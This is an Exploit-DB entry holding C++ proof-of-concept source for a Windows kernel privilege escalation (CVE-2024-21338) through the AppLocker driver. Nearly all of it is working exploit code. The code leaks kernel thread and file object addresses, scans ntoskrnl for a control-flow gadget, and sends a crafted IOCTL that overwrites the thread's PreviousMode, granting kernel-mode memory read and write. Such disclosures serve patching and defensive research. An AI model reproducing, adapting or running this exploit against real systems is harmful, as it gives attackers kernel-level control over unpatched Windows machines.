Microsoft Windows 11 - Kernel Privilege Escalation

EDB-ID:

52275




Platform:

Windows

Date:

2025-04-22


# Exploit Title: Microsoft Windows 11 - Kernel Privilege Escalation
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2024-21338



#include "pch.hpp"
#include "poc.hpp"

// This function is used to set the IOCTL buffer depending on the Windows
version
void* c_poc::set_ioctl_buffer(size_t* k_thread_offset, OSVERSIONINFOEXW*
os_info)
{
 os_info->dwOSVersionInfoSize = sizeof(*os_info);
 // Get the OS version
 NTSTATUS status = RtlGetVersion(os_info);
 if (!NT_SUCCESS(status)) {
  log_err("Failed to get OS version!");
  return nullptr;
 }

 log_debug("Windows version detected: %lu.%lu, build: %lu.",
os_info->dwMajorVersion, os_info->dwMinorVersion, os_info->dwBuildNumber);

 // "PreviousMode" offset in ETHREAD structure
 *k_thread_offset = 0x232;
 // Set the "AipSmartHashImageFile" function buffer depending on the
Windows version
 void* ioctl_buffer_alloc = os_info->dwBuildNumber < 22000
  ? malloc(sizeof(AIP_SMART_HASH_IMAGE_FILE_W10))
  : malloc(sizeof(AIP_SMART_HASH_IMAGE_FILE_W11));

 return ioctl_buffer_alloc;
}

// This function is used to get the ETHREAD address through the
SystemHandleInformation method that is used to get the address of the
current thread object based on the pseudo handle -2
UINT_PTR c_poc::get_ethread_address()
{
 // Duplicate the pseudo handle -2 to get the current thread object
 HANDLE h_current_thread_pseudo = reinterpret_cast<HANDLE>(-2);
 HANDLE h_duplicated_handle = {};

 if (!DuplicateHandle(
  reinterpret_cast<HANDLE>(-1),
  h_current_thread_pseudo,
  reinterpret_cast<HANDLE>(-1),
  &h_duplicated_handle,
  NULL,
  FALSE,
  DUPLICATE_SAME_ACCESS))
 {
  log_err("Failed to duplicate handle, error: %lu", GetLastError());
  return EXIT_FAILURE;
 }

 NTSTATUS status = {};
 ULONG ul_bytes = {};
 PSYSTEM_HANDLE_INFORMATION h_table_info = {};
 // Get the current thread object address
 while ((status = NtQuerySystemInformation(SystemHandleInformation,
h_table_info, ul_bytes, &ul_bytes)) == STATUS_INFO_LENGTH_MISMATCH)
 {
  if (h_table_info != NULL)
   h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, h_table_info, (2 * (SIZE_T)ul_bytes));
  else
   h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, (2 * (SIZE_T)ul_bytes));
 }

 UINT_PTR ptr_token_address = 0;
 if (NT_SUCCESS(status)) {
  for (ULONG i = 0; i < h_table_info->NumberOfHandles; i++) {
   if (h_table_info->Handles[i].UniqueProcessId == GetCurrentProcessId() &&
    h_table_info->Handles[i].HandleValue ==
    reinterpret_cast<USHORT>(h_duplicated_handle)) {
    ptr_token_address =
     reinterpret_cast<UINT_PTR>(h_table_info->Handles[i].Object);
    break;
   }
  }
 }
 else {
  if (h_table_info) {
   log_err("NtQuerySystemInformation failed, (code: 0x%X)", status);
   NtClose(h_duplicated_handle);
  }
 }

 return ptr_token_address;
}

// This function is used to get the FileObject address through the
SystemHandleInformation method that is used to get the address of the file
object.
UINT_PTR c_poc::get_file_object_address()
{
 // Create a dummy file to get the file object address
 HANDLE h_file = CreateFileW(L"C:\\Users\\Public\\example.txt",
  GENERIC_READ | GENERIC_WRITE,
  FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr,
  CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr);
 if (h_file == INVALID_HANDLE_VALUE) {
  log_err("Failed to open dummy file, error: %lu", GetLastError());
  return EXIT_FAILURE;
 }

 // Get the file object address
 NTSTATUS status = {};
 ULONG ul_bytes = 0;
 PSYSTEM_HANDLE_INFORMATION h_table_info = NULL;
 while ((status = NtQuerySystemInformation(
  SystemHandleInformation, h_table_info, ul_bytes,
  &ul_bytes)) == STATUS_INFO_LENGTH_MISMATCH) {
  if (h_table_info != NULL)
   h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, h_table_info, 2 * (SIZE_T)ul_bytes);
  else
   h_table_info = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, 2 * (SIZE_T)ul_bytes);

 }

 UINT_PTR token_address = 0;
 if (NT_SUCCESS(status)) {
  for (ULONG i = 0; i < h_table_info->NumberOfHandles; i++) {
   if (h_table_info->Handles[i].UniqueProcessId == GetCurrentProcessId() &&
    h_table_info->Handles[i].HandleValue ==
    reinterpret_cast<USHORT>(h_file)) {
    token_address =
     reinterpret_cast<UINT_PTR>(h_table_info->Handles[i].Object);
    break;
   }
  }
 }

 return token_address;
}

// This function is used to get the kernel module address based on the
module name
UINT_PTR c_poc::get_kernel_module_address(const char* target_module)
{
 // Get the kernel module address based on the module name
 NTSTATUS status = {};
 ULONG ul_bytes = {};
 PSYSTEM_MODULE_INFORMATION h_table_info = {};
 while ((status = NtQuerySystemInformation(
  SystemModuleInformation, h_table_info, ul_bytes,
  &ul_bytes)) == STATUS_INFO_LENGTH_MISMATCH) {
  if (h_table_info != NULL)
   h_table_info = (PSYSTEM_MODULE_INFORMATION)HeapReAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, h_table_info, 2 * (SIZE_T)ul_bytes);
  else
   h_table_info = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, 2 * (SIZE_T)ul_bytes);
 }

 if (NT_SUCCESS(status)) {
  for (ULONG i = 0; i < h_table_info->ModulesCount; i++) {
   if (strstr(h_table_info->Modules[i].Name, target_module) != nullptr) {
    return reinterpret_cast<UINT_PTR>(
     h_table_info->Modules[i].ImageBaseAddress);
   }
  }
 }

 return 0;
}

// This function is used to scan the section for the pattern.
BOOL c_poc::scan_section_for_pattern(HANDLE h_process, LPVOID
lp_base_address, SIZE_T dw_size, BYTE* pattern, SIZE_T pattern_size,
LPVOID* lp_found_address) {
 std::unique_ptr<BYTE[]> buffer(new BYTE[dw_size]);
 SIZE_T bytes_read = {};
 if (!ReadProcessMemory(h_process, lp_base_address, buffer.get(), dw_size,
  &bytes_read)) {
  return false;
 }

 for (SIZE_T i = 0; i < dw_size - pattern_size; i++) {
  if (memcmp(pattern, &buffer[i], pattern_size) == 0) {
   *lp_found_address = reinterpret_cast<LPVOID>(
    reinterpret_cast<DWORD_PTR>(lp_base_address) + i);
   return true;
  }
 }

 return false;
}

// This function is used to find the pattern in the module, in this case
the pattern is the nt!ExpProfileDelete function
UINT_PTR c_poc::find_pattern(HMODULE h_module)
{
 UINT_PTR relative_offset = {};

 auto* p_dos_header = reinterpret_cast<PIMAGE_DOS_HEADER>(h_module);
 auto* p_nt_headers = reinterpret_cast<PIMAGE_NT_HEADERS>(
  reinterpret_cast<LPBYTE>(h_module) + p_dos_header->e_lfanew);
 auto* p_section_header = IMAGE_FIRST_SECTION(p_nt_headers);

 LPVOID lp_found_address = nullptr;

 for (WORD i = 0; i < p_nt_headers->FileHeader.NumberOfSections; i++) {
  if (strcmp(reinterpret_cast<CHAR*>(p_section_header[i].Name), "PAGE") ==
   0) {
   LPVOID lp_section_base_address =
    reinterpret_cast<LPVOID>(reinterpret_cast<LPBYTE>(h_module) +
     p_section_header[i].VirtualAddress);
   SIZE_T dw_section_size = p_section_header[i].Misc.VirtualSize;

   // Pattern to nt!ExpProfileDelete
   BYTE pattern[] = { 0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x83,
    0x79, 0x30, 0x00, 0x48, 0x8B, 0xD9, 0x74 };
   SIZE_T pattern_size = sizeof(pattern);

   if (this->scan_section_for_pattern(
    GetCurrentProcess(), lp_section_base_address, dw_section_size,
    pattern, pattern_size, &lp_found_address)) {
    relative_offset = reinterpret_cast<UINT_PTR>(lp_found_address) -
     reinterpret_cast<UINT_PTR>(h_module);
   }

   break;
  }
 }

 return relative_offset;
}

// This function is used to send the IOCTL request to the driver, in this
case the AppLocker driver through the AipSmartHashImageFile IOCTL
bool c_poc::send_ioctl_request(HANDLE h_device, PVOID input_buffer, size_t
input_buffer_length)
{
 IO_STATUS_BLOCK io_status = {};
 NTSTATUS status =
  NtDeviceIoControlFile(h_device, nullptr, nullptr, nullptr, &io_status,
   this->IOCTL_AipSmartHashImageFile, input_buffer,
   input_buffer_length, nullptr, 0);
 return NT_SUCCESS(status);
}

// This function executes the exploit
bool c_poc::act() {
 // Get the OS version, set the IOCTL buffer and open a handle to the
AppLocker driver
 OSVERSIONINFOEXW os_info = {};
 size_t offset_of_previous_mode = {};
 auto ioctl_buffer = this->set_ioctl_buffer(&offset_of_previous_mode,
&os_info);

 if (!ioctl_buffer) {
  log_err("Failed to allocate the correct buffer to send on the IOCTL
request.");
  return false;
 }

 // Open a handle to the AppLocker driver
 OBJECT_ATTRIBUTES object_attributes = {};
 UNICODE_STRING appid_device_name = {};
 RtlInitUnicodeString(&appid_device_name, L"\\Device\\AppID");
 InitializeObjectAttributes(&object_attributes, &appid_device_name,
OBJ_CASE_INSENSITIVE, NULL, NULL, NULL);

 IO_STATUS_BLOCK io_status = {};
 HANDLE h_device = {};
 NTSTATUS status = NtCreateFile(&h_device, GENERIC_READ | GENERIC_WRITE,
  &object_attributes, &io_status, NULL, FILE_ATTRIBUTE_NORMAL,
  FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, 0, NULL, 0);

 if (!NT_SUCCESS(status))
 {
  log_debug("Failed to open a handle to the AppLocker driver (%ls) (code:
0x%X)", appid_device_name.Buffer, status);
  return false;
 }

 log_debug("AppLocker (AppId) handle opened: 0x%p", h_device);

 log_debug("Leaking the current ETHREAD address.");

 // Get the ETHREAD address, FileObject address, KernelBase address and the
relative offset of the nt!ExpProfileDelete function
 auto e_thread_address = this->get_ethread_address();
 auto file_obj_address = this->get_file_object_address();

 auto ntoskrnl_kernel_base_address =
this->get_kernel_module_address("ntoskrnl.exe");
 auto ntoskrnl_user_base_address =
LoadLibraryExW(L"C:\\Windows\\System32\\ntoskrnl.exe", NULL, NULL);

 if (!e_thread_address && !ntoskrnl_kernel_base_address &&
!ntoskrnl_user_base_address && !file_obj_address)
 {
  log_debug("Failed to fetch the ETHREAD/FileObject/KernelBase addresses.");
  return false;
 }

 log_debug("ETHREAD address leaked: 0x%p", e_thread_address);
 log_debug("Feching the ExpProfileDelete (user cfg gadget) address.");
 auto relative_offset = this->find_pattern(ntoskrnl_user_base_address);
 UINT_PTR kcfg_gadget_address = (ntoskrnl_kernel_base_address +
relative_offset);

 ULONG_PTR previous_mode = (e_thread_address + offset_of_previous_mode);
 log_debug("Current ETHREAD PreviousMode address -> 0x%p", previous_mode);
 log_debug("File object address -> 0x%p", file_obj_address);

 log_debug("kCFG Kernel Base address -> 0x%p",
ntoskrnl_kernel_base_address);
 log_debug("kCFG User Base address -> 0x%p", ntoskrnl_user_base_address);
 log_debug("kCFG Gadget address -> 0x%p", kcfg_gadget_address);

 // Set the IOCTL buffer depending on the Windows version
 size_t ioctl_buffer_length = {};
 CFG_FUNCTION_WRAPPER kcfg_function = {};
 if (os_info.dwBuildNumber < 22000) {
  AIP_SMART_HASH_IMAGE_FILE_W10* w10_ioctl_buffer =
(AIP_SMART_HASH_IMAGE_FILE_W10*)ioctl_buffer;

  kcfg_function.FunctionPointer = (PVOID)kcfg_gadget_address;
  // Add 0x30 because of lock xadd qword ptr [rsi-30h], rbx in
ObfDereferenceObjectWithTag
  UINT_PTR previous_mode_obf = previous_mode + 0x30;

  w10_ioctl_buffer->FirstArg = previous_mode_obf; // +0x00
  w10_ioctl_buffer->Value = (PVOID)file_obj_address; // +0x08
  w10_ioctl_buffer->PtrToFunctionWrapper = &kcfg_function; // +0x10

  ioctl_buffer_length = sizeof(AIP_SMART_HASH_IMAGE_FILE_W10);
 }
 else
 {
  AIP_SMART_HASH_IMAGE_FILE_W11* w11_ioctl_buffer =
(AIP_SMART_HASH_IMAGE_FILE_W11*)ioctl_buffer;

  kcfg_function.FunctionPointer = (PVOID)kcfg_gadget_address;
  // Add 0x30 because of lock xadd qword ptr [rsi-30h], rbx in
ObfDereferenceObjectWithTag
  UINT_PTR previous_mode_obf = previous_mode + 0x30;

  w11_ioctl_buffer->FirstArg = previous_mode_obf; // +0x00
  w11_ioctl_buffer->Value = (PVOID)file_obj_address; // +0x08
  w11_ioctl_buffer->PtrToFunctionWrapper = &kcfg_function; // +0x10
  w11_ioctl_buffer->Unknown = NULL; // +0x18

  ioctl_buffer_length = sizeof(AIP_SMART_HASH_IMAGE_FILE_W11);
 }

 // Send the IOCTL request to the driver
 log_debug("Sending IOCTL request to 0x22A018 (AipSmartHashImageFile)");
 char* buffer = (char*)malloc(sizeof(CHAR));
 if (ioctl_buffer)
 {
  log_debug("ioctl_buffer -> 0x%p size: %d", ioctl_buffer,
ioctl_buffer_length);

  if (!this->send_ioctl_request(h_device, ioctl_buffer,
ioctl_buffer_length))
   return false;

  NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)buffer,
(PVOID)previous_mode, sizeof(CHAR), nullptr);
  log_debug("Current PreviousMode -> %d", *buffer);

  // From now on all Read/Write operations will be done in Kernel Mode.
 }

 log_debug("Restoring...");
 // Restores PreviousMode to 1 (user-mode).
 *buffer = 1;
 NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)previous_mode,
(PVOID)buffer, sizeof(CHAR), nullptr);
 log_debug("Current PreviousMode -> %d", *buffer);

 // Free the allocated memory and close the handle to the AppLocker driver
 free(ioctl_buffer);
 free(buffer);
 NtClose(h_device);


 return true;
}